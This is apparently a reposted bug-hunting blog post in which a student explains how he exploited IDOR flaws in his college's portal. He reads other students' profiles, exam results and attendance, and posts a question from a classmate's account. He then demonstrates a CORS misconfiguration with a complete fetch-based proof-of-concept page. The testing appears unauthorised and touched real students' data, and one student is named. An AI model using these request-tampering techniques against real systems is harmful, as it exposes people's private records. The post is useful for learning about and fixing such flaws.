.png)
9 months ago
59 BOOK THIS SPACE FOR AD
ARTICLE AD
Hey there! It’s cyberpro151 here and in todays’ article, I will share how I was able to hack my college’s website. So let’s get started.
So while surfing my college’s website a few days ago, I saw an option called
“My Profile”. After seeing this option, I thought that I should see what request is getting sent to the server. So I immediately opened BurpSuite and clicked on “My Profile”. The request looked something like following:
Host: redacted.com
Connection: close
Content-Length: 32
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: redacted.com
{"Student_ID":"MYCAMPUS2252557"}
So I thought about changing the value of my roll number from “MYCAMPUS2252557” to “MYCAMPUS2252551” to see if the profile of roll number “551” is being shown or not. Thus, after changing the value of “Student_ID” parameter to “MYCAMPUS2252551”, I sent the request and saw my browser and BOOM! I got data of my fellow whose roll number was 551 along with all of his personal details.
Thus, I thought about testing some other functionalities too in the website and while surfing, I got to see an option through which we can ask questions to our teachers through the website.
So I quickly clicked on it and the inferface looked something like following:
I quickly selected subject as “Computer Science” and typed a random question “a” and clicked on “Send” to see the request that was getting sent to server. The request looked something like following:
POST /api/Mobile/send_questionEx HTTP/1.1Host: redacted.com
Connection: close
Content-Length: 388
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"device_Id":"MYCAMPUS2252557010064645373612100053736","application_Version":"1.4.8","Student_ID":"MYCAMPUS2252557","Teacher_ID":"e6d52f91-b403-4016-a1c9-5efc55b1ee6a","Question":"a","userMacAddress":"dsdd","Subject_ID":"1a767865-b9f3-4800-bb0f-52409e13d97f","Section_ID":"75d05cec-ffa0-44ab-b995-b2db59985afd","From":"Muhammad Bilal Ashraf","Topic":null,"application_Name":"REDACTED"}
Now in this request, I changed the value of parameter “Student_ID” from “MYCAMPUS2252557” to “MYCAMPUS2252574” and clicked on Send in BurpSuite. Now, when I went on the browser and clicked on “History” of questions to see if any question “a” is present or not, then to my surprise, there wasn’t any question with value “a”. I immediately called my fellow with roll number “74” and asked him to see if there is any question in history of his account with value “a” and he was also surprised to see the question was being sent from his account.
After finding two bugs, I further investigated and got following link by fuzzing:
https://redacted.com/selectCMS
I opened this link and got to see following interface:
I clicked on Exam Results and again intercpeted the request and the request looked something like following:
POST /api/Mobile/StudentPortalGetAllExamsResult HTTP/1.1Host: redacted.com
Connection: close
Content-Length: 32
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"Student_ID":"MYCAMPUS2252557"}
I changed the value of parameter “Student_ID” to “MYCAMPUS2252551” and clicked on “Send” on Burpsuite and I was again able to see the result of Roll number 551. This was the third IDOR.
Then I clicked on “Attendance” option and following request got sent:
POST /api/Mobile/attendance_cms HTTP/1.1Host: redacted.com
Connection: close
Content-Length: 88
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"Student_ID":"MYCAMPUS2252557","Class_Level_ID":"8931d744-acc9-4776-a03a-2b705038ea48"}
I changed the value fo “Student_ID” to “MYCAMPUS2252551” and again I was able to see all the attendance details of roll number “551”.
Now even if these bugs could’ve been fixed, still I could have been able to access the data of other users because of CORS misconfigurations present on all of the endpoints. For example, if we consider the endpoint though which we can view all the past questions that we have asked, then the request looked something like following:
POST /api/Mobile/GetStudentChatWithTeacher HTTP/1.1Host: redacted.com
Connection: close
Content-Length: 32
sec-ch-ua: "Not A(Brand";v="99", "Brave";v="121", "Chromium";v="121"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-GPC: 1
Accept-Language: en-US,en;q=0.7
Origin: https://redacted.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://redacted.com/
{"Student_ID":"MYCAMPUS2252557"}
I sent this request to repeater and added another header which is given below:
Origin: google.comAfter adding this header, I sent the request and I got following response:
HTTP/1.1 200 OKServer: nginx
Date: Wed, 14 Feb 2024 09:10:18 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Set-Cookie: sessioncookie=e895ea89047eda1aefab4471005e7af7; expires=Wed, 14-Feb-24 10:10:17 GMT; max-age=3600; domain=redacted.com
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Access-Control-Allow-Origin: *
Content-Length: 379
{"data":[{"lazyLoader":{},"questionId":"a541443c-f8c7-4e48-9087-7ca8b370f401","question":"a","date":"2023-11-01T00:11:25.521557+05:00","from":"Muhammad Bilal Ashraf","topic":"","teacherName":"Muhammad Bilal Ashraf","subject":"Computer Science","answer":"?","responsDate":"2023-11-01T12:45:11.443131+05:00","mark":true}],"message":{"text":"","title":"","messageTypeId":"Success"}}
The header “Access-Control-Allow-Origin: *” compelled me to test for CORS misconfiguration so I wrote some HTML and JavaScript and the code for testing CORS misconfiguration looked something like following:
<!DOCTYPE html><html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<script src="script.js"></script>
</head>
<body>
</body>
</html>
The code for script.js is as given below:
const url = 'https://redacted.com/api/Mobile/GetStudentChatWithTeacher';const method = 'POST';
const headers = new Headers();
headers.append('Content-Type', 'application/json');
headers.append('Referrer', 'https://redacted.com/');
const body = JSON.stringify({
"Student_ID":"MYCAMPUS2252557"
});
const options = {
method,
headers,
body
};
fetch(url, options)
.then(response => response.json())
.then(data => {
// Handle the response data, e.g., update the UI
console.log(data);
})
.catch(error => {
// Handle errors
console.error(error);
});
I saved both files and opened the file “cors.html” and when I navigated to Console to see if question is being displayed or not, then as expected, the question was being displayed as shown below:
Hence, I tested other endpoints too and they were also vulnerable to CORS misconfigurations.
Thanks for reading this article and I hope so it would have been helpful for all of you.
Bengali (Bangladesh) · 
English (United States) ·